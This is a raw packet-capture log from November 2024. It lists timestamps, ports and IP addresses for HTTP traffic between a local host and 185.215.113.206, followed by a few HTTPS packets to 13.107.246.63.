Nov 26, 2024 00:25:18.834002018 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.834883928 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.834937096 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.835378885 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.835434914 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.835896015 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.835952997 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.835973024 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.836026907 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.836898088 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.836961985 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.836987019 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.837038040 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.837930918 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.837987900 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.838037014 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.838084936 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.838948011 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.838994026 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.839013100 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.839063883 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.840274096 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.840286970 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.840333939 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.840976954 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.841027021 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.841089964 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.841157913 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.842022896 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.842102051 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.842261076 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.842310905 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.843076944 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.843133926 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.843199015 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.843251944 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.844018936 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.844069958 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.897228003 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.897244930 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.897357941 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.897505045 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.897562981 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.897701979 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.897758007 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.897804976 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.897860050 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.898716927 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.898772955 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.898822069 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.898871899 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.899766922 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.899823904 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.899878025 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.899930000 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.900799036 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.900856018 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.900891066 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.901084900 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.902153015 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.902204037 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.902209044 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.902256012 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.902832031 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.902885914 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.902911901 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.902962923 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.903862000 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.903917074 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.903940916 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.903991938 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.904867887 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.904927015 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.904948950 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.905002117 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.906374931 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.906462908 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.906480074 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.906528950 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.906908989 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.906963110 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.907332897 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.907407999 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.907948971 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.908008099 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.908062935 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.908128023 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.909045935 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.909100056 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.909226894 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.909277916 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.909996033 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.910051107 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.910108089 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.910159111 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.911675930 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.911717892 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.911729097 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.911762953 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.912568092 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.912626982 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.912707090 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.912760973 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.913034916 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.913088083 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.946732044 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.946871042 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.947057962 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.947123051 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.947324991 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.947375059 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.947396994 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.947441101 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.948354006 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.948409081 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.948621988 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.948671103 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.948754072 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.948810101 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.949702024 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.949755907 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.949902058 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.949955940 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.950822115 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.950834990 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.950875044 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.950894117 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.951678991 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.951734066 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.951781988 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.951834917 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.952739954 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.952795982 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.952836990 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.952887058 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.953871012 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.953891993 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.953927040 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.953948975 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.954756021 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.954811096 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.955382109 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.955446959 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.955746889 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.955804110 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.955878019 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.955926895 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.956770897 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.956846952 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.956962109 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.957014084 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.957822084 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.957878113 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.957988024 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.958043098 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:18.958997965 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.959009886 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:18.959058046 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.022551060 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.022568941 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.022630930 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.022653103 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.022809029 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.022869110 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.022928953 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.022980928 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.023725986 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.023787975 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.023859978 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.023916006 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.024730921 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.024866104 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.024894953 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.024909973 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.025762081 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.025818110 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.025882959 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.025945902 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.027003050 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.027017117 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.027065992 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.027810097 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.027869940 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.027936935 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.028008938 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.029041052 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.029053926 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.029110909 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.030047894 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.030105114 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.030123949 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.030177116 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.030966043 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.031024933 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.031153917 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.031208038 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.032033920 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.032047033 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.032085896 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.032109022 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.032949924 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.032999992 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.033076048 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.033129930 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.034054995 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.034079075 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.034111977 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.034133911 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.035172939 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.035187960 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.035223961 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.036237955 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.036312103 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.036423922 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.036468029 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.037132978 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.037153006 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.037184000 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.037208080 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.038072109 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.038124084 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.038213968 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.038259983 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.039632082 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.039654016 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.039684057 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.039706945 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.040401936 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.040448904 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.040529013 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.040577888 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.041112900 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.041160107 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.041563034 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.041606903 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.042179108 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.042279959 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.042321920 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.042382002 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.043261051 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.043311119 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.043353081 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.043394089 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.044887066 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.044900894 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.044939995 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.044965029 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.045171976 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.045219898 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.098596096 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.098678112 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.098906040 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.098934889 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.098987103 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.099019051 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.099302053 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.099359035 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.099668980 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.099723101 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.099817038 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.099868059 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.101026058 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.101079941 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.101140022 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.101190090 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.101701021 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.101756096 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.101803064 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.101851940 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.102725029 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.102777958 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.102838993 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.102890968 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.104484081 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.104506016 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.104545116 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.104564905 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.104739904 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.104793072 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.104876041 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.104928970 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.105796099 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.105849028 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.105873108 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.105931044 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.106837034 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.106890917 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.106918097 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.106973886 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.107817888 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.107870102 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.107897043 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.107947111 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.108988047 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.109010935 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.109056950 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.109076977 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.109843016 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.109895945 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.109980106 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.110032082 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.110928059 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.110982895 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.111005068 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.111054897 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.111906052 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.111962080 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.112020016 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.112073898 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.112941027 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.112997055 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.113641977 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.113696098 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.113991976 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.114041090 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.114048958 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.114094973 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.148070097 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.148140907 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.148169994 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.148237944 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:19.148972988 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:19.149035931 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:20.058379889 CET	443	49722	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.058902979 CET	49722	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.058928013 CET	443	49722	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.059413910 CET	49722	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.059420109 CET	443	49722	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.073636055 CET	443	49723	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.074419975 CET	49723	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.074440002 CET	443	49723	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.074951887 CET	49723	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.074959040 CET	443	49723	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.117176056 CET	443	49724	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.128598928 CET	49724	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.128621101 CET	443	49724	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.129290104 CET	49724	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.129297018 CET	443	49724	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.140312910 CET	443	49725	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.141062021 CET	49725	443	192.168.2.6	13.107.246.63
